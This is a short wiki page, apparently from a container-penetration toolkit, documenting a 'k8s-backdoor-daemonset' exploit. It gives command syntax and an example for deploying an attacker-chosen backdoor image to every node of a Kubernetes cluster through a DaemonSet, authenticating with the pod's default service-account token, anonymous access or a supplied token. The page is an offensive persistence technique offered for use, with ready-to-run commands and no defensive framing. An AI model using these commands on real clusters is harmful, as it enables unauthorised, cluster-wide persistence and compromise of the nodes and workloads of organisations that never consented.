Skip to content

Exploit: k8s backdoor daemonset

Jump to bottom
cdxy edited this page Jan 20, 2021 · 2 revisions

Deploy target backdoor image to each node via daemonset.

通过daemonset将用户指定的后门镜像部署到每个node。

Usage

./cdk run k8s-backdoor-daemonset (default|anonymous|<service-account-token-path>) <image>

Request Options:
default: connect API server with pod's default service account token
anonymous: connect API server with user system:anonymous
<service-account-token-path>: connect API server with user-specified service account token.

Exploit Options:
<image>: your backdoor image (you can upload it to dockerhub before)

Example

Deploy a pod with image:ubuntu to each node:

./cdk run k8s-backdoor-daemonset default ubuntu

png

Clone this wiki locally